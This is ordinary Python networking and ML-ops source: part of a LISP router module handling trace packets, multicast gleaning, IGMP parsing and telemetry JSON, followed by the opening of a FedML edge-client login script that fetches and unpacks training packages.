return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
    # Display the port if the caller is an encapsulating RTR using a
    # translated RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["sr"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["sr"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed[0] + "ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["n"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["dr"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["dr"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["lats"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["se"] = seid
rec["de"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
    # Search for the record. If we are appending the first ITR node entry,
    # get its RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["de"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["se"] = deid
rec["de"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
    # Otherwise we are forwarding a packet that is about to be encapsulated,
    # or we are forwarding a packet that was just decapsulated with the
    # addresses swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["n"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
# Clear the DF-bit because we may have to fragment as the packet is going
# to grow with trace data.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
# df_flags = struct.unpack("B", headers[6:7])[0] & 0xbf
# headers = headers[0:6] + struct.pack("B", df_flags) + headers[7::]
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if ("instance-id" in entry):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if ("eid-prefix" in entry):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if ("group-prefix" in entry):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if ("rloc-prefix" in entry):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
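#
# Editor's illustrative sketch, not part of the original lispers.net source:
# the shape of a lisp_glean_mappings entry as consumed above. The two prefix
# values are lisp_address() objects in the real table; "instance-id" is a
# (low, high) range, and every key except the two policy booleans is
# optional.
#
def lisp_example_glean_mapping(eid_prefix, rloc_prefix):
    return({ "instance-id" : (0, 0xffffffff), "eid-prefix" : eid_prefix,
        "rloc-prefix" : rloc_prefix, "rloc-probe" : False,
        "igmp-query" : False })
#enddef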
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (seid_str in lisp_gleaned_groups):
if (group_str in lisp_gleaned_groups[seid_str]):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically, odd IGMPv3 record types are Joins and even record types are
# Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when the packet is an IGMP query and
# an array when it is a report. The caller must check whether it has context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0:1])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
(igmp_type in igmp_types) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
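    # The second 32-bit word of an IGMPv3 report is 16 reserved bits plus a
    # 16-bit group-record count, so the ntohl'ed value already stored in
    # group.address above is the record count (the reserved bits are zero).
    #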
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
        if (len(igmp) < group_size): return(register_entries)
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (record_type not in lisp_igmp_record_types):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
            if (len(igmp) < source_size): return(register_entries)
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
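#
# Editor's illustrative sketch, not part of the original lispers.net source:
# classify the IGMP type byte the same way lisp_process_igmp_packet() does,
# given a raw IGMP payload (IP header already stripped).
#
def lisp_example_igmp_message_kind(igmp):
    igmp_type = struct.unpack("B", igmp[0:1])[0]
    if (igmp_type == 0x11): return("query")
    if (igmp_type in (0x12, 0x16)): return("v1/v2-join")
    if (igmp_type == 0x17): return("v2-leave")
    if (igmp_type == 0x22): return("v3-report")
    return("unsupported")
#enddef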
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return a dictionary array if the json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if ("type" not in tel): return(None)
if ("sub-type" not in tel): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
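#
# Editor's illustrative usage sketch, not part of the original lispers.net
# source: an ITR stamping its two telemetry fields on the template. Fields
# already filled in are left alone, and the ETR fields stay "?" until the
# ETR stamps them.
#
def lisp_example_stamp_itr_telemetry(json_string):
    now = str(lisp_get_timestamp())
    return(lisp_encode_telemetry(json_string, ii=now, io=now))
#enddef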
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if ("telemetry" not in lisp_json_list): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#
# lisp_mr_or_pubsub
#
# Test action for Map-Request or Map-Request with Subscribe bit set.
#
def lisp_mr_or_pubsub(action):
return(action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])
#enddef
#------------------------------------------------------------------------------
|
login.py | import argparse
import json
import multiprocessing
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import time
import traceback
import urllib
import uuid
import zipfile
from os.path import expanduser
import psutil
import requests
import yaml
from fedml.cli.edge_deployment.mqtt_manager import MqttManager
from fedml.cli.edge_deployment.yaml_utils import load_yaml_config
from fedml.mlops import MLOpsMetrics
import click
class FedMLClientRunner:
def __init__(self, args, edge_id, request_json=None):
self.mqtt_mgr = None
self.client_mqtt_mgr = None
self.edge_id = edge_id
self.process = None
self.args = args
self.request_json = request_json
self.version = args.version
self.device_id = args.device_id
self.cloud_region = args.cloud_region
self.cur_dir = os.path.split(os.path.realpath(__file__))[0]
if args.current_running_dir is not None:
self.cur_dir = args.current_running_dir
self.sudo_cmd = ""
self.is_mac = False
if platform.system() == "Darwin":
self.is_mac = True
self.agent_config = None
self.fedml_data_base_package_dir = os.path.join("/", "fedml", "data")
self.fedml_data_local_package_dir = os.path.join("/", "fedml", "fedml-package", "fedml", "data")
self.fedml_data_dir = self.fedml_data_base_package_dir
self.fedml_config_dir = os.path.join("/", "fedml", "conf")
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES = {"${FEDSYS.RUN_ID}": "",
"${FEDSYS.PRIVATE_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_ID_LIST}": "",
"${FEDSYS.SYNTHETIC_DATA_URL}": "",
"${FEDSYS.IS_USING_LOCAL_DATA}": "",
"${FEDSYS.CLIENT_NUM}": "",
"${FEDSYS.CLIENT_INDEX}": "",
"${FEDSYS.CLIENT_OBJECT_LIST}": "",
"${FEDSYS.LOG_SERVER_URL}": ""}
self.container_name = None
self.mlops_metrics = None
click.echo("Current directory of client agent: " + self.cur_dir)
@staticmethod
def generate_yaml_doc(run_config_object, yaml_file):
try:
file = open(yaml_file, 'w', encoding='utf-8')
yaml.dump(run_config_object, file)
file.close()
        except Exception as e:
            click.echo("Failed to generate yaml file: {}".format(traceback.format_exc()))
def build_dynamic_constrain_variables(self, run_id, run_config, unzip_package_path):
data_config = run_config["data_config"]
server_edge_id_list = self.request_json["edgeids"]
local_edge_id_list = [1]
local_edge_id_list[0] = self.edge_id
is_using_local_data = 0
private_data_dir = data_config["privateLocalData"]
synthetic_data_url = data_config["syntheticDataUrl"]
edges = self.request_json["edges"]
# if private_data_dir is not None \
# and len(str(private_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
if private_data_dir is None or len(str(private_data_dir).strip(' ')) <= 0:
params_config = run_config.get("parameters", None)
private_data_dir = os.path.join(unzip_package_path, "fedml", "data")
if synthetic_data_url is None or len(str(synthetic_data_url)) <= 0:
synthetic_data_url = private_data_dir
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.RUN_ID}"] = run_id
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.PRIVATE_LOCAL_DATA}"] = private_data_dir.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_ID_LIST}"] = str(local_edge_id_list).replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.SYNTHETIC_DATA_URL}"] = synthetic_data_url.replace(' ', '')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.IS_USING_LOCAL_DATA}"] = str(is_using_local_data)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_NUM}"] = len(server_edge_id_list)
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_INDEX}"] = server_edge_id_list.index(self.edge_id) + 1
client_objects = str(json.dumps(edges))
client_objects = client_objects.replace(" ", "").replace("\n", "").replace('"', '\\"')
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.CLIENT_OBJECT_LIST}"] = client_objects
self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES["${FEDSYS.LOG_SERVER_URL}"] = self.agent_config["ml_ops_config"][
"LOG_SERVER_URL"]
def unzip_file(self, zip_file, unzip_file_path):
result = False
if zipfile.is_zipfile(zip_file):
with zipfile.ZipFile(zip_file, 'r') as zipf:
zipf.extractall(unzip_file_path)
result = True
return result
def retrieve_and_unzip_package(self, package_name, package_url):
package_file_no_extension = str(package_name).split('.')[0]
home_dir = expanduser("~")
local_package_path = os.path.join(home_dir, "fedml-client", "fedml_packages")
        os.makedirs(local_package_path, exist_ok=True)
local_package_file = os.path.join(local_package_path, os.path.basename(package_url))
if not os.path.exists(local_package_file):
urllib.request.urlretrieve(package_url, local_package_file)
unzip_package_path = local_package_path
try:
shutil.rmtree(os.path.join(unzip_package_path, package_file_no_extension), ignore_errors=True)
except Exception as e:
pass
self.unzip_file(local_package_file, unzip_package_path)
unzip_package_path = os.path.join(unzip_package_path, package_file_no_extension)
return unzip_package_path
def update_local_fedml_config(self, run_id, run_config):
packages_config = run_config["packages_config"]
# Copy config file from the client
unzip_package_path = self.retrieve_and_unzip_package(packages_config["linuxClient"],
packages_config["linuxClientUrl"])
fedml_local_config_file = unzip_package_path + os.path.join("/", "conf", "fedml.yaml")
# Load the above config to memory
config_from_container = load_yaml_config(fedml_local_config_file)
container_entry_file_config = config_from_container["entry_config"]
container_dynamic_args_config = config_from_container["dynamic_args"]
entry_file = container_entry_file_config["entry_file"]
conf_file = container_entry_file_config["conf_file"]
full_conf_path = os.path.join(unzip_package_path, "fedml", "config", os.path.basename(conf_file))
home_dir = expanduser("~")
